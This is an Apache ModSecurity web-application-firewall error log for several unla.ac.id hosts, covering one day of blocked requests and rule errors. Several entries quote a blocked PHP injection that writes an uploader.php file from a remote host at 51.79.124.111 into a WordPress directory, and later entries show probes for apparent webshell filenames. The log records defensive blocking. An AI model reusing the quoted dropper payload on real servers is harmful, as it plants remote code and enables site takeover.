[Mon Aug 28 09:07:15.613627 2023] [:error] [pid 38774] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwBU8Co-f0AAJd2keAAAAAH"]
[Mon Aug 28 09:07:15.811935 2023] [:error] [pid 38772] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBU8Co-f0AAJd0nlwAAAAC"]
[Mon Aug 28 09:08:10.343111 2023] [:error] [pid 38763] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwBisCo-f0AAJdrnnYAAAAK"]
[Mon Aug 28 09:08:15.344892 2023] [:error] [pid 38768] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBj8Co-f0AAJdwdPkAAAAA"]
[Mon Aug 28 09:08:34.295280 2023] [:error] [pid 38768] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwBosCo-f0AAJdwdPoAAAAA"]
[Mon Aug 28 09:08:34.780048 2023] [:error] [pid 38763] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBosCo-f0AAJdrnncAAAAK"]
[Mon Aug 28 09:08:35.636359 2023] [:error] [pid 38774] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOwBo8Co-f0AAJd2keEAAAAH"]
[Mon Aug 28 09:08:35.776631 2023] [:error] [pid 38772] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBo8Co-f0AAJd0nl8AAAAC"]
[Mon Aug 28 09:08:43.214579 2023] [:error] [pid 38763] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwBq8Co-f0AAJdrnngAAAAK"]
[Mon Aug 28 09:08:43.362629 2023] [:error] [pid 38765] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBq8Co-f0AAJdtoeUAAAAO"]
[Mon Aug 28 09:09:05.090949 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwBwcCo-f0AAJcb5BcAAAAP"]
[Mon Aug 28 09:09:05.258529 2023] [:error] [pid 38774] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBwcCo-f0AAJd2keIAAAAH"]
[Mon Aug 28 09:09:37.821917 2023] [:error] [pid 38773] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwB4cCo-f0AAJd1fo0AAAAE"]
[Mon Aug 28 09:09:37.840610 2023] [:error] [pid 38774] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB4cCo-f0AAJd2keUAAAAH"]
[Mon Aug 28 09:09:40.006180 2023] [:error] [pid 38764] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwB5MCo-f0AAJdscLgAAAAM"]
[Mon Aug 28 09:09:40.027091 2023] [:error] [pid 39080] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB5MCo-f0AAJio1eYAAAAA"]
[Mon Aug 28 09:09:42.741508 2023] [:error] [pid 39009] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB5sCo-f0AAJhh@GQAAAAB"]
[Mon Aug 28 09:09:44.436992 2023] [:error] [pid 38773] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwB6MCo-f0AAJd1fo4AAAAE"]
[Mon Aug 28 09:09:44.453045 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB6MCo-f0AAJcb5BgAAAAP"]
[Mon Aug 28 09:10:47.000838 2023] [:notice] [pid 39164] ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/) configured.
[Mon Aug 28 09:10:47.000875 2023] [:notice] [pid 39164] ModSecurity: APR compiled version="1.5.1-dev"; loaded version="1.5.1-dev"
[Mon Aug 28 09:10:47.000884 2023] [:notice] [pid 39164] ModSecurity: PCRE compiled version="8.31 "; loaded version="8.41 2017-07-05"
[Mon Aug 28 09:10:47.000891 2023] [:warn] [pid 39164] ModSecurity: Loaded PCRE do not match with compiled!
[Mon Aug 28 09:10:47.000896 2023] [:notice] [pid 39164] ModSecurity: LUA compiled version="Lua 5.1"
[Mon Aug 28 09:10:47.000901 2023] [:notice] [pid 39164] ModSecurity: LIBXML compiled version="2.9.1"
[Mon Aug 28 09:24:36.049275 2023] [:error] [pid 39311] [client 202.46.68.208] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "107.158.200.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/fnMahasiswa.js"] [unique_id "ZOwFZMCo-f0AAJmPvi4AAAAN"]
[Mon Aug 28 09:24:36.049387 2023] [:error] [pid 39241] [client 202.46.68.208] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "47.128.17.47_d5ae13be7392b2ff9294a5a6fb7a01af2825c089"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_syaratsidang.js"] [unique_id "ZOwFZMCo-f0AAJlJPMkAAAAA"]
[Mon Aug 28 09:24:36.050293 2023] [:error] [pid 39329] [client 202.46.68.208] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "107.158.200.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_tabs.js"] [unique_id "ZOwFZMCo-f0AAJmhJtAAAAAP"]
[Mon Aug 28 09:40:01.145416 2023] [:error] [pid 39674] [client 180.245.251.164] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "47.128.17.125_d5ae13be7392b2ff9294a5a6fb7a01af2825c089"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/panel/top-bottom.gif"] [unique_id "ZOwJAcCo-f0AAJr6T60AAAAd"]
[Mon Aug 28 10:56:21.211620 2023] [:error] [pid 40914] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOwa5cCo-f0AAJ-SWiIAAAAA"]
[Mon Aug 28 12:59:18.130409 2023] [:error] [pid 43203] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x22c40bc9a142aedd9843a421c88e1c1e8f\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693202358\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}24c7741578ea849101356d9ebce4acaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/auth/login"] [unique_id "ZOw3tsCo-f0AAKjDF8UAAAAB"]
[Mon Aug 28 12:59:18.508007 2023] [:error] [pid 43203] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x22c40bc9a142aedd9843a421c88e1c1e8f\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693202358\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}24c7741578ea849101356d9ebce4acaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOw3tsCo-f0AAKjDF8YAAAAB"]
[Mon Aug 28 13:19:37.771311 2023] [:error] [pid 43574] [client 101.36.112.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x22e3448b04f0139e6ca45257a48ddca145\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22101.36.112.218\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Versio\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693203576\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}954f436b079389694f1c1cf6dfc51dee"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/auth/login"] [unique_id "ZOw8ecCo-f0AAKo2RcQAAAAH"]
[Mon Aug 28 14:24:07.805745 2023] [:error] [pid 44954] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxLl8Co-f0AAK@afgYAAAAQ"]
[Mon Aug 28 15:06:11.371985 2023] [:error] [pid 45673] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "103.131.71.237_db02c4dfe96252ec0e41fec1b5db44e10a1552be"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/window/left-right.png"] [unique_id "ZOxVc8Co-f0AALJpZEgAAAAP"]
[Mon Aug 28 15:06:11.383219 2023] [:error] [pid 45695] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "36.73.46.32_0ba5e8e415dca693f68608774440f10cdf3ede12"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/panel/tool-sprites.gif"] [unique_id "ZOxVc8Co-f0AALJ--K8AAAAc"]
[Mon Aug 28 15:06:11.383341 2023] [:error] [pid 45682] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.56_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/window/top-bottom.png"] [unique_id "ZOxVc8Co-f0AALJyGBwAAAAJ"]
[Mon Aug 28 15:17:52.545958 2023] [:error] [pid 45908] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxYMMCo-f0AALNUpMgAAAAM"]
[Mon Aug 28 16:16:36.514086 2023] [:error] [pid 47123] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxl9MCo-f0AALgTvo0AAAAB"]
[Mon Aug 28 16:37:41.080781 2023] [:error] [pid 47323] [client 114.79.54.96] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "92.223.85.64_3bc502ef5f769384b905d8481265ba50974f998b"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_absen.js"] [unique_id "ZOxq5cCo-f0AALjbMhkAAAAV"]
[Mon Aug 28 16:37:41.081945 2023] [:error] [pid 47473] [client 114.79.54.96] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.251.69_7f6db45c1c52196446be482c23fdf8894ecdbc81"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_det_dpp.js"] [unique_id "ZOxq5cCo-f0AALlxYKwAAAAL"]
[Mon Aug 28 17:54:55.233264 2023] [:error] [pid 48971] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/auth/login"] [unique_id "ZOx8-8Co-f0AAL9LJpUAAAAD"]
[Mon Aug 28 17:54:58.820405 2023] [:error] [pid 48971] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOx9AsCo-f0AAL9LJpYAAAAD"]
[Mon Aug 28 17:54:58.869064 2023] [:error] [pid 48971] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOx9AsCo-f0AAL9LJpcAAAAD"]
[Mon Aug 28 17:55:08.247107 2023] [:error] [pid 49123] [client 114.122.101.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x227e1f9cb6fd2f23b7c827cc0dc70294bd\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22114.122.101.3\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693220095\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}8449092b28801ef34dec568188d5a43d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOx9DMCo-f0AAL-jnLkAAAAV"]
[Mon Aug 28 18:07:45.123652 2023] [:error] [pid 49205] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/template/alfav.php"] [unique_id "ZOyAAcCo-f0AAMA1IJIAAAAI"]
[Mon Aug 28 18:07:45.227362 2023] [:error] [pid 49205] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOyAAcCo-f0AAMA1IJMAAAAI"]
[Mon Aug 28 18:07:54.150310 2023] [:error] [pid 49260] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-/0xNix1337.php"] [unique_id "ZOyACsCo-f0AAMBsQuUAAAAL"]
[Mon Aug 28 18:08:02.838343 2023] [:error] [pid 49205] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-/0xNix.php"] [unique_id "ZOyAEsCo-f0AAMA1IJQAAAAI"]
[Mon Aug 28 18:08:09.322797 2023] [:error] [pid 49258] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-/0xNix.php"] [unique_id "ZOyAGcCo-f0AAMBqw6cAAAAH"]
